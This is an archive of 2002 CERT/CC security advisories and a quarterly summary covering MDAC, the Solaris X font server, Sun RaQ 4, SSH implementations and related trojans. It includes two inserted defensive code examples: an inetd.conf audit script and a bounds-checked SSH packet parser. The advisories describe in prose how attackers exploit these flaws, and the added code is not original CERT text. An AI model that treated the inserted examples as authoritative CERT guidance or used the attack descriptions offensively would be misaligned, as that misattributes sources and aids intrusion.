* Versions of Microsoft Data Access Components (MDAC) prior to 2.7
* Internet Explorer version 6
* Internet Explorer version 5.5
* Internet Explorer version 5.1

Note that Microsoft Windows XP is shipped with MDAC version 2.7 and is not vulnerable by default even though Internet Explorer 6.0 is installed.

Because the normal operation of several applications and web servers on a system depends on the proper operation of the MDAC ActiveX control, other programs could be used as an exploit vector. For example, Internet Information Server may be configured to use MDAC.

Overview

A vulnerability in the Microsoft Data Access Components (MDAC) could lead to remote execution of code with the privileges of the current process or user.

I. Description

Microsoft Data Access Components (MDAC) is a collection of utilities and routines to process requests between databases and network applications. A buffer overflow vulnerability exists in the Remote Data Services (RDS) component of MDAC. The RDS component provides an intermediary step for a client's request for service from a back-end database that enables the web site to apply business logic to the request.

According to Microsoft's Security Bulletin MS02-065, a routine in the RDS component, specifically the RDS Data Stub function, contains an unchecked buffer. The RDS Data Stub function's purpose is to parse incoming HTTP requests and generate RDS commands. This unchecked buffer could be exploited to cause a heap overflow.

There are two ways in which this vulnerability can be exploited. The first involves an attacker sending a malicious HTTP request to a vulnerable service, such as an IIS server. If RDS is enabled, the attacker can execute arbitrary code as the IIS server. RDS is not enabled by default on Windows 2000 and Windows XP systems. It can be disabled on other systems by following the advice in Microsoft's security bulletin.

The other way to exploit this vulnerability involves a malicious web site hosting a page that exploits the buffer overflow in the MDAC RDS stub through a client application, such as Internet Explorer. Most systems running Internet Explorer on operating systems other than Windows XP are vulnerable to this attack. The attacker is able to run arbitrary code as the user viewing the malicious web page.

Both web servers and client applications that rely on MDAC are affected. It is recommended that all users of Microsoft Windows 98, Windows 98 SE, Windows ME, Windows NT 4.0, and Windows 2000 apply the patch (Q329414). Windows XP users are not affected since MDAC 2.7, the non-vulnerable version, is installed by default.

Information about this vulnerability is discussed in VU#542081. This issue is also being referenced as CAN-2002-1142.

II. Impact

A remote attacker could execute arbitrary code with the privileges of the application that processed the request. In the case of a web server or other service, this is likely to be the SYSTEM or another account with elevated privileges. In the case of a client application, this will be the account used to view the web page.

III. Solution

Apply a patch from your vendor
Microsoft has released a patch (Q329414) and a security bulletin (MS02-065) to address this issue. An end-user version of MS02-065 is available at
http://www.microsoft.com/security/security_bulletins/ms02-065.asp.

According to the Microsoft advisory, a scenario exists by which a vulnerable version of the control may be re-installed on a Windows system even after the patch has been applied. This is because the vulnerable ActiveX control is signed by Microsoft and the patch does not set the kill bit for the MDAC control.

_________________________________________________________________

This vulnerability was reported in an advisory by Foundstone and in MS02-065 by Microsoft.

_________________________________________________________________

Feedback can be sent to the authors: Jason A. Rafail, Chad R. Dougherty, and Cory F. Cohen.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-33.html

Copyright 2002 Carnegie Mellon University.

Revision History

November 21, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPd1NYGjtSoHZUTs5AQHUzAQAxi1VWaNhv/9ihPvBWXPU/NmrQxcF3AGx
SCtW1Lsgs7b0LHeNFKwEYxQu7nBGoc4otgQ1oVj+ftrJwOHSA560qPB9Pbu7doSG
7Hql8T/LdOGgcRIAPmLPvAK1rDT2oN85S/adpaQgFRgQw7RYLMsgjCKmQivpCpDA
/8Vb+bI52YU=
=3mho
-----END PGP SIGNATURE-----

Date: Mon, 25 Nov 2002 20:12:27 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service

Original release date: November 25, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
* Sun Microsystems Solaris 2.6 (Sparc/Intel)
* Sun Microsystems Solaris 7 (Sparc/Intel)
* Sun Microsystems Solaris 8 (Sparc/Intel)
* Sun Microsystems Solaris 9 (Sparc)

Overview

The Solaris X Window Font Service (XFS) daemon (fs.auto) contains a remotely exploitable buffer overflow vulnerability that could allow an attacker to execute arbitrary code or cause a denial of service.

I. Description

A remotely exploitable buffer overflow vulnerability exists in the Solaris X Window Font Service (XFS) daemon (fs.auto). Exploitation of this vulnerability can lead to arbitrary code execution on a vulnerable Solaris system. This vulnerability was discovered by ISS X-Force.

The Solaris X Window Font Service (XFS) serves font files to clients. Sun describes the XFS service as follows:

The X Font Server is a simple TCP/IP-based service that serves font files to its clients. Clients connect to the server to request a font set, and the server reads the font files off the disk and serves them to the clients. The X Font Server daemon consists of a server binary /usr/openwin/bin/xfs.

The XFS daemon is installed and running by default on all versions of the Solaris operating system.
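Since the advisory states above that fs.auto is installed and running by default, the first thing a Solaris administrator wants to know is whether it is still active on a given host. The following audit of /etc/inetd.conf is an added Python example (not code from the advisory or from Sun): it parses the classic inetd.conf format (service, socket type, protocol, flags, user, server path, arguments), reports whether the font-server entry is enabled, and produces a copy of the file with that entry commented out. The sample file contents, including the fs.auto server path, are constructed for this example; the exact line on a given Solaris release may differ, which is why matching is done by service name and program name rather than by the full line.

```python
"""Audit /etc/inetd.conf for the Solaris X font server entry (added example for CA-2002-34)."""
import os
from collections import namedtuple

SOCKET_TYPES = {"stream", "dgram", "raw", "rdm", "seqpacket"}
FONT_SERVER_PROGRAMS = {"fs.auto", "xfs"}   # wrapper and server binary named in the advisory

Entry = namedtuple("Entry", "lineno enabled service socket proto flags user server args")

# Constructed sample, not copied from a real system; field order follows inetd.conf(4).
SAMPLE_INETD_CONF = """\
# constructed sample, not copied from a real system
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd        in.ftpd
#telnet stream  tcp     nowait  root    /usr/sbin/in.telnetd     in.telnetd
fs      stream  tcp     wait    nobody  /usr/openwin/lib/fs.auto fs
dtspc   stream  tcp     nowait  root    /usr/dt/bin/dtspcd       /usr/dt/bin/dtspcd
"""


def parse_line(lineno, raw):
    """Parse one line. Commented-out entries come back with enabled=False;
    blank lines and free-text comments return None."""
    line = raw.strip()
    if not line:
        return None
    enabled = not line.startswith("#")
    parts = line.lstrip("#").split(None, 6)
    if len(parts) < 6 or parts[1] not in SOCKET_TYPES:
        return None
    args = parts[6] if len(parts) == 7 else ""
    return Entry(lineno, enabled, parts[0], parts[1], parts[2], parts[3],
                 parts[4], parts[5], args)


def parse_inetd_conf(text):
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        e = parse_line(n, raw)
        if e is not None:
            entries.append(e)
    return entries


def is_font_server(entry):
    """Match on the service name or on the program the entry starts."""
    return entry.service == "fs" or os.path.basename(entry.server) in FONT_SERVER_PROGRAMS


def font_server_status(text):
    """Return (active, disabled) lists of font-server entries found in the file."""
    found = [e for e in parse_inetd_conf(text) if is_font_server(e)]
    return [e for e in found if e.enabled], [e for e in found if not e.enabled]


def disable_font_server(text):
    """Return the file contents with every active font-server entry commented out."""
    out = []
    for n, raw in enumerate(text.splitlines(), 1):
        e = parse_line(n, raw)
        out.append("#" + raw if (e is not None and e.enabled and is_font_server(e)) else raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    active, disabled = font_server_status(SAMPLE_INETD_CONF)
    for e in active:
        print(f"line {e.lineno}: font server ACTIVE as user {e.user} ({e.server})")
    for e in disabled:
        print(f"line {e.lineno}: font server entry present but commented out")
    if active:
        print("--- proposed /etc/inetd.conf ---")
        print(disable_font_server(SAMPLE_INETD_CONF), end="")
```

To apply this on a real host, read /etc/inetd.conf into `text`, write the output of disable_font_server() back in place of it, and then restart inetd as the advisory's workaround describes; the audit alone is enough to confirm on a patched host that the service was not silently re-enabled.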
Further information about this vulnerability may be found in VU#312313.
http://www.kb.cert.org/vuls/id/312313

This vulnerability is also being referred to as CAN-2002-1317 by CVE.

Note that this vulnerability is in the X Window Font Server, and not the filesystem of a similar name.

II. Impact

A remote attacker can execute arbitrary code with the privileges of the fs.auto daemon (typically nobody) or cause a denial of service by crashing the service.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

Disable vulnerable service

Until patches can be applied, you may wish to disable the XFS daemon (fs.auto). As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. On a typical Solaris system, it should be possible to disable the fs.auto daemon by commenting out the relevant entries in /etc/inetd.conf and then restarting the inetd process.

Workarounds

Block access to port 7100/TCP at your network perimeter. Note that this will not protect vulnerable hosts within your network perimeter.

Appendix A. - Vendor Information

NetBSD

NetBSD ships the xfs from XFree86, though it's not on or used by default.

OpenBSD

We do not have XFS.

SGI

We're not vulnerable to this.

Sun Microsystems

The Solaris X font server (xfs(1)) is affected by VU#312313 in the following supported versions of Solaris:

Solaris 2.6
Solaris 7
Solaris 8
Solaris 9

Patches are being generated for all of the above releases. Sun will be publishing a Sun Alert for this issue at the following location shortly:
http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/48879

The patches will be available from:
http://sunsolve.sun.com/securitypatch

Appendix B. - References

1. ISS X-Force Security Advisory: Solaris fs.auto Remote Compromise Vulnerability - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21541
2. Sun Cluster 3.0 U1 Data Services Developer's Guide, Chapter 6: Sample DSDL Resource Type Implementation - http://docs.sun.com/db/doc/806-7072/6jfvjtg1l?q=xfs&a=view
3. CERT/CC Vulnerability Note: VU#312313 - http://www.kb.cert.org/vuls/id/312313
4. CVE reference number CAN-2002-1317. Information available at http://cve.mitre.org

_________________________________________________________________

Internet Security Systems publicly reported this vulnerability.

_________________________________________________________________

Authors: Ian A. Finlay and Shawn V. Hernan.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-34.html

Copyright 2002 Carnegie Mellon University.

Revision History

November 25, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPeK49WjtSoHZUTs5AQHV5wP7BzZtllAnLIcz88VnsMZmC8PB8X1stQDx
aNnrPLhgQ7SWXZM/ESAsBBU+ieQodPJlmxy3yb00812uJmaO9wJPMoRnJnrZPkvU
6iSVJpo3nP85sS+mzpneavM7EuFr7BvJ0+jqhl/21GgMCaJz8zul0rVjUWDOBHl1
NNaWQi2Urb8=
=L7NC
-----END PGP SIGNATURE-----

Date: Tue, 26 Nov 2002 16:00:31 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Summary CS-2002-04

CERT Summary CS-2002-04

November 26, 2002

Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.

Past CERT summaries are available from:

   CERT Summaries
   http://www.cert.org/summaries/
______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in August 2002 (CS-2002-03), we have seen trojan horses for three popular distributions, new self-propagating malicious code (Apache/mod_ssl), and multiple vulnerabilities in BIND. In addition, we have issued a new PGP Key.

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.

   CERT/CC Current Activity
   http://www.cert.org/current/current_activity.html

1. Apache/mod_ssl Worm

Over the past several months, we have received reports of a self-propagating malicious code that exploits a vulnerability (VU#102795) in OpenSSL. Reports received by the CERT/CC indicate that the Apache/mod_ssl worm has already infected thousands of systems. Over a month earlier, the CERT/CC issued an advisory (CA-2002-23) describing four remotely exploitable buffer overflows in OpenSSL.

   CERT Advisory CA-2002-27 Apache/mod_ssl Worm
   http://www.cert.org/advisories/CA-2002-27.html

   CERT Advisory CA-2002-23 Multiple Vulnerabilities in OpenSSL
   http://www.cert.org/advisories/CA-2002-23.html

   Vulnerability Note #102795 OpenSSL servers contain a buffer overflow during the SSL2 handshake process
   http://www.kb.cert.org/vuls/id/102795

2. Trojan Horse Sendmail Distribution

The CERT/CC has received confirmation that some copies of the source code for the Sendmail package have been modified by an intruder to contain a Trojan horse. These copies began to appear in downloads from the FTP server ftp.sendmail.org on or around September 28, 2002. On October 8, 2002, the CERT/CC issued an advisory (CA-2002-28) describing various methods to verify software authenticity.

   CERT Advisory CA-2002-28 Trojan Horse Sendmail Distribution
   http://www.cert.org/advisories/CA-2002-28.html

3. Trojan Horse tcpdump and libpcap Distributions

The CERT/CC has received reports that some copies of the source code for libpcap, a packet acquisition library, and tcpdump, a network sniffer, have been modified by an intruder and contain a Trojan horse. These modified distributions began to appear in downloads from the HTTP server www.tcpdump.org on or around Nov 11, 2002. The CERT/CC issued an advisory (CA-2002-30) listing MD5 checksums and official distribution sites for libpcap and tcpdump.

   CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions
   http://www.cert.org/advisories/CA-2002-30.html

4. Multiple Vulnerabilities in BIND

The CERT/CC has documented multiple vulnerabilities in BIND, the popular domain name server and client library software package from the Internet Software Consortium (ISC). Some of these vulnerabilities may allow a remote intruder to execute arbitrary code with privileges of the user running named (typically root). Several vulnerabilities are referenced in the advisory; they are listed here individually.

   CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND
   http://www.cert.org/advisories/CA-2002-31.html

   Vulnerability Note #852283 Cached malformed SIG record buffer overflow
   http://www.kb.cert.org/vuls/id/852283

   Vulnerability Note #229595 Overly large OPT record assertion
   http://www.kb.cert.org/vuls/id/229595

   Vulnerability Note #581682 ISC Bind 8 fails to properly dereference cache SIG RR elements invalid expiry times from the internal database
   http://www.kb.cert.org/vuls/id/581682

   Vulnerability Note #844360 Domain Name System (DNS) stub resolver libraries vulnerable to buffer overflows via network name or address lookups
   http://www.kb.cert.org/vuls/id/844360

5. Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)

On November 21, 2002 the CERT/CC issued an advisory (CA-2002-33) describing a vulnerability in MDAC, a collection of Microsoft utilities and routines that process requests between databases and network applications.

   CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)
   http://www.cert.org/advisories/CA-2002-33.html
______________________________________________________________________

New CERT/CC PGP Key

On September 19, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.

   CERT/CC PGP Public Key
   https://www.cert.org/pgp/cert_pgp_key.asc

   Sending Sensitive Information To The CERT/CC
   http://www.cert.org/contact_cert/encryptmail.html
______________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new and updated

   * Advisories
     http://www.cert.org/advisories/
   * Congressional Testimony
     http://www.cert.org/congressional_testimony/
   * CERT/CC Statistics
     http://www.cert.org/stats/cert_stats.html
   * Home User Security
     http://www.cert.org/homeusers/HomeComputerSecurity
   * Tech Tips
     http://www.cert.org/tech_tips/
   * Training Schedule
     http://www.cert.org/training/
______________________________________________________________________

This document is available from:
http://www.cert.org/summaries/CS-2002-04.html
______________________________________________________________________

Copyright ©2002 Carnegie Mellon University.

From - Thu Dec 12 15:24:01 2002
Date: Thu, 12 Dec 2002 11:17:15 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-35 Vulnerability in RaQ 4 Servers

CERT Advisory CA-2002-35 Vulnerability in RaQ 4 Servers

   Original release date: December 11, 2002
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   * Sun Cobalt RaQ 4 Server Appliances with the Security Hardening Package installed

Overview

A remotely exploitable vulnerability has been discovered in Sun Cobalt RaQ 4 Server Appliances running Sun's Security Hardening Package (SHP). Exploitation of this vulnerability may allow remote attackers to execute arbitrary code with superuser privileges.

I. Description

Cobalt RaQ 4 is a Sun Server Appliance. For background information on Cobalt RaQ 4, please see the COBALT RaQ 4 User Manual. Sun provides a Security Hardening Package (SHP) for Cobalt RaQ 4. Although the SHP is not installed by default, many users choose to install it on their RaQ 4 servers. For background information on the SHP, please see the SHP RaQ 4 User Guide.

A vulnerability in the SHP may allow a remote attacker to execute arbitrary code on a Cobalt RaQ 4 Server Appliance. The vulnerability occurs in a cgi script that does not properly filter input. Specifically, overflow.cgi does not adequately filter input destined for the email variable. Because of this flaw, an attacker can use a POST request to fill the email variable with arbitrary commands. The attacker can then call overflow.cgi, which will allow the command the attacker filled the email variable with to be executed with superuser privileges. An exploit is publicly available and may be circulating.

Further information about this vulnerability may be found in VU#810921 in the CERT/CC Vulnerability Notes Database.

II. Impact

A remote attacker may be able to execute arbitrary code on a Cobalt RaQ 4 Server Appliance with the SHP installed.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

Workarounds

Block access to the Cobalt RaQ 4 administrative httpd server (typically ports 81/TCP and 444/TCP) at your network perimeter. Note that this will not protect vulnerable hosts within your network perimeter. It is important to understand your network configuration and service requirements before deciding what changes are appropriate.

Caveats

The patch supplied by Sun removes the SHP completely. If your operation requires the use of the SHP, you may need to find a suitable alternative.

Appendix A. - Vendor Information

Sun Microsystems

   Sun confirms that a remote root exploit does affect the Sun/Cobalt RaQ4 platform if the SHP (Security Hardening Patch) patch was installed. Sun has released a Sun Alert which describes how to remove the SHP patch:

      http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/49377

   The removal patch is available from:

      http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg

Appendix B. - References

   1. CERT/CC Vulnerability Note: VU#810921 -
      http://www.kb.cert.org/vuls/id/810921
   2. Sun SHP RaQ 4 User Guide -
      http://www.sun.com/hardware/serverappliances/pdfs/support/RaQ_4_SHP_UG.pdf
   3. COBALT RaQ 4 User Manual -
      http://www.sun.com/hardware/serverappliances/pdfs/manuals/manual.raq4.pdf
_________________________________________________________________

grazer@digit-labs.org publicly reported this vulnerability.
_________________________________________________________________

Author: Ian A. Finlay.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-35.html
______________________________________________________________________

Copyright 2002 Carnegie Mellon University.

Revision History

   December 11, 2002: Initial release

From - Mon Dec 16 15:22:20 2002
Date: Mon, 16 Dec 2002 14:37:51 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations

CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations

   Original issue date: December 16, 2002
   Last revised: --
   Source: CERT/CC

   A complete revision history is at the end of this file.

Systems Affected

   * Secure shell (SSH) protocol implementations in SSH clients and servers from multiple vendors

Overview

Multiple vendors' implementations of the secure shell (SSH) transport layer protocol contain vulnerabilities that could allow a remote attacker to execute arbitrary code with the privileges of the SSH process or cause a denial of service. The vulnerabilities affect SSH clients and servers, and they occur before user authentication takes place.

I. Description

The SSH protocol enables a secure communications channel from a client to a server. From the IETF draft SSH Transport Layer Protocol:

   The SSH transport layer is a secure low level transport protocol. It provides strong encryption, cryptographic host authentication, and integrity protection.... Key exchange method, public key algorithm, symmetric encryption algorithm, message authentication algorithm, and hash algorithm are all negotiated.

Rapid7 has developed a suite (SSHredder) of test cases that examine the connection initialization, key exchange, and negotiation phase (KEX, KEXINIT) of the SSH transport layer protocol. The suite tests the way an SSH transport layer implementation handles invalid or incorrect packet and string lengths, padding and padding length, malformed strings, and invalid algorithms.
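A bounds-checked parser for the fields SSHredder mutates, added here as an illustration and not taken from the advisory, from Rapid7 or from any vendor: it validates the SSH-2 packet_length and padding_length against the bytes actually received, reads string fields without trusting their length prefix, and rejects name-lists with empty elements or NUL bytes. The error codes, the 8-byte pre-negotiation block size and the single-name-list test packet are assumptions of this example.

```c
/* Defensive parsing of the SSH-2 binary packet and of the "string" and
 * "name-list" fields carried in KEXINIT. Constructed example, not CERT's,
 * Rapid7's or any vendor's code; layout follows the secsh-transport draft. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SSH_MAX_PACKET 35000u  /* smallest maximum the draft requires implementations to accept */
#define SSH_BLOCK      8u      /* cipher block size before keys are negotiated */

enum { SSH_OK = 0, SSH_E_SHORT = -1, SSH_E_LENGTH = -2, SSH_E_PADDING = -3,
       SSH_E_ALIGN = -4, SSH_E_STRING = -5, SSH_E_NAMELIST = -6, SSH_E_NUL = -7 };

static uint32_t rd_u32(const uint8_t *p)
{ return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }

static void wr_u32(uint8_t *p, uint32_t v)
{ p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v; }

/* Outer packet: uint32 packet_length, byte padding_length, payload, padding.
 * Each length field is checked against the bytes actually received before it
 * is used as a size; on success *payload/*payload_len point into buf. */
int ssh_parse_packet(const uint8_t *buf, size_t len,
                     const uint8_t **payload, size_t *payload_len)
{
    if (len < 5) return SSH_E_SHORT;
    uint32_t packet_length = rd_u32(buf);
    uint8_t padding_length = buf[4];
    if (packet_length < 5 || packet_length > SSH_MAX_PACKET) return SSH_E_LENGTH;
    if ((size_t)packet_length + 4 > len) return SSH_E_LENGTH;      /* claims more than we got */
    if (padding_length < 4) return SSH_E_PADDING;                   /* draft minimum */
    if ((size_t)padding_length + 1 > packet_length) return SSH_E_PADDING; /* would underflow */
    if ((packet_length + 4) % SSH_BLOCK != 0) return SSH_E_ALIGN;
    *payload = buf + 5;
    *payload_len = packet_length - padding_length - 1;
    return SSH_OK;
}

/* One SSH "string" (uint32 length + bytes) at *off, bounds-checked against
 * the payload instead of trusting the length field. */
int ssh_read_string(const uint8_t *p, size_t plen, size_t *off,
                    const uint8_t **s, size_t *slen)
{
    if (*off > plen || plen - *off < 4) return SSH_E_STRING;
    uint32_t n = rd_u32(p + *off);
    if (n > plen - *off - 4) return SSH_E_STRING;   /* length runs past the payload */
    *s = p + *off + 4;
    *slen = n;
    *off += 4 + n;
    return SSH_OK;
}

/* A name-list is comma-separated names: no empty element (leading, trailing
 * or doubled comma) and no NUL byte, which a C string routine would stop at. */
int ssh_namelist_valid(const uint8_t *s, size_t slen)
{
    size_t name_len = 0;
    for (size_t i = 0; i < slen; i++) {
        if (s[i] == '\0') return SSH_E_NUL;
        if (s[i] != ',') { name_len++; continue; }
        if (name_len == 0) return SSH_E_NAMELIST;
        name_len = 0;
    }
    return (slen == 0 || name_len > 0) ? SSH_OK : SSH_E_NAMELIST;  /* empty list is legal */
}

/* Parse a packet whose payload is a single name-list string (a cut-down
 * stand-in for the ten name-lists of KEXINIT); returns the first error. */
int ssh_check_namelist_packet(const uint8_t *buf, size_t len)
{
    const uint8_t *payload, *s;
    size_t plen, slen, off = 0;
    int rc = ssh_parse_packet(buf, len, &payload, &plen);
    if (rc != SSH_OK) return rc;
    rc = ssh_read_string(payload, plen, &off, &s, &slen);
    if (rc != SSH_OK) return rc;
    return ssh_namelist_valid(s, slen);
}

/* Build a well-formed packet around a constructed name-list, then apply the
 * kind of mutation SSHredder does (forged string length, forged padding
 * length, truncated packet; pass 0 / -1 / 0 for none) and check it. */
int ssh_demo(const char *names, uint32_t forged_strlen, int forged_padding, size_t truncate)
{
    uint8_t buf[256];
    size_t n = strlen(names), payload_len = 4 + n;
    size_t padding = SSH_BLOCK - (5 + payload_len) % SSH_BLOCK;   /* align 4+packet_length */
    if (padding < 4) padding += SSH_BLOCK;
    uint32_t packet_length = (uint32_t)(1 + payload_len + padding);
    if (sizeof buf < 4 + packet_length) return SSH_E_SHORT;
    wr_u32(buf, packet_length);
    buf[4] = (uint8_t)padding;
    wr_u32(buf + 5, forged_strlen ? forged_strlen : (uint32_t)n);
    memcpy(buf + 9, names, n);
    memset(buf + 9 + n, 0, padding);
    if (forged_padding >= 0) buf[4] = (uint8_t)forged_padding;
    return ssh_check_namelist_packet(buf, 4 + packet_length - truncate);
}
```

A parser that applies these checks before any length is used fails closed on the malformed inputs instead of reading or copying past the received bytes; a real implementation would run the same checks over every KEXINIT name-list and every later string field.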
The test suite has demonstrated a number of vulnerabilities in different vendors' SSH products. These vulnerabilities include buffer overflows, and they occur before any user authentication takes place. SSHredder was primarily designed to test key exchange and other processes that are specific to version 2 of the SSH protocol; however, certain classes of tests are also applicable to version 1.

Further information about this set of vulnerabilities may be found in Vulnerability Note VU#389665. Rapid7 has published a detailed advisory (R7-0009) and the SSHredder test suite.

Common Vulnerabilities and Exposures (CVE) has assigned the following candidate numbers for several classes of tests performed by SSHredder:

   * CAN-2002-1357 - incorrect field lengths
   * CAN-2002-1358 - lists with empty elements or multiple separators
   * CAN-2002-1359 - "classic" buffer overflows
   * CAN-2002-1360 - null characters in strings

II. Impact

The impact will vary for different vulnerabilities and products, but in severe cases, remote attackers could execute arbitrary code with the privileges of the SSH process. Both SSH servers and clients are affected, since both implement the SSH transport layer protocol. On Microsoft Windows systems, SSH servers commonly run with SYSTEM privileges, and on UNIX systems, SSH daemons typically run with root privileges. In the case of SSH clients, any attacker-supplied code would run with the privileges of the user who started the client program, with the possible exception of SSH clients that may be configured with an effective user ID of root (setuid root). Attackers could also crash a vulnerable SSH process, causing a denial of service.

III. Solution

Apply a patch or upgrade

Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A below and the Systems Affected section of VU#389665 for specific information.

Restrict access

Limit access to SSH servers to trusted hosts and networks using firewalls or other packet-filtering systems. Some SSH servers may have the ability to restrict access based on IP addresses, or similar effects may be achieved by using TCP wrappers or other related technology. SSH clients can reduce the risk of attacks by only connecting to trusted servers by IP address. While these workarounds will not prevent exploitation of these vulnerabilities, they will make attacks somewhat more difficult, in part by limiting the number of potential sources of attacks.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. The Systems Affected section of VU#389665 contains additional vendor status information.

Cisco Systems, Inc.

   The official statement regarding this is that we are not vulnerable.

Cray Inc.

   Cray Inc. supports the OpenSSH product through their Cray Open Software (COS) package. COS 3.3, available the end of December 2002, is not vulnerable. If a site is concerned, they can contact their local Cray representative to obtain an early copy of the OpenSSH contained in COS 3.3.

F-Secure

   F-Secure SSH products are not exploitable via these attacks. While F-Secure SSH versions 3.1.0 build 11 and earlier crash on these malicious packets, we did not find ways to exploit this to gain unauthorized access or to run arbitrary code. Furthermore, the crash occurs in a forked process so the denial of service attacks are not possible.

Fujitsu

   Fujitsu's UXP/V OS is not vulnerable because it does not support SSH.

IBM

   IBM's AIX is not vulnerable to the issues discussed in CERT Vulnerability Note VU#389665.

lsh

   I've now tried the testsuite with the latest stable release of lsh, lsh-1.4.2. Both the client and the server seem NOT VULNERABLE.

NetScreen Technologies Inc.

   Tested latest versions. Not Vulnerable.

OpenSSH

   From my testing it seems that the current version of OpenSSH (3.5) is not vulnerable to these problems, and some limited testing shows that no version of OpenSSH is vulnerable.

Pragma Systems, Inc.

   December 16, 2002

   Rapid 7 and CERT Coordination Center Vulnerability report VU#389665

   Pragma Systems Inc. of Austin, Texas, USA, was notified regarding a possible vulnerability with Version 2.0 of Pragma SecureShell. Pragma Systems tested Pragma SecureShell 2.0 and the upcoming new Version 3.0, and found that the attacks did cause a memory access protection fault on Microsoft platforms. After research, Pragma Systems corrected the problem. The correction of the problem leads us to believe that any attack would not cause a Denial of Service, or the ability of random code to run on the server. The problem is corrected in Pragma SecureShell Version 3.0.

   Any customers with concerns regarding this vulnerability report should contact Pragma Systems, Inc at support@pragmasys.com for information on obtaining an upgrade free of charge. Pragma's web site is located at www.pragmasys.com and the company can be reached at 1-512-219-7270.

PuTTY

   PuTTY 0.53b addresses vulnerabilities discovered by SSHredder.

SSH Communications Security

   SSH Secure Shell products are not exploitable via these attacks.

Appendix B. References

   * CERT/CC Vulnerability Note: VU#389665 -
     http://www.kb.cert.org/vuls/id/389665
   * Rapid 7 Advisory: R7-0009 -
     http://www.rapid7.com/advisories/R7-0009.txt
   * Rapid 7 SSHredder test suite -
     http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666
   * IETF Draft: SSH Transport Layer Protocol -
     http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.txt
   * IETF Draft: SSH Protocol Architecture -
     http://www.ietf.org/internet-drafts/draft-ietf-secsh-architecture-13.txt
   * Privilege Separated OpenSSH -
     http://www.citi.umich.edu/u/provos/ssh/privsep.html
_________________________________________________________________

The CERT Coordination Center thanks Rapid7 for researching and reporting these vulnerabilities.
_________________________________________________________________

Author: Art Manion.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-36.html
______________________________________________________________________

Copyright 2002 Carnegie Mellon University.

Revision History

   December 16, 2002: Initial release

From - Thu Dec 19 15:02:52 2002
Date: Thu, 19 Dec 2002 14:12:38 -0500
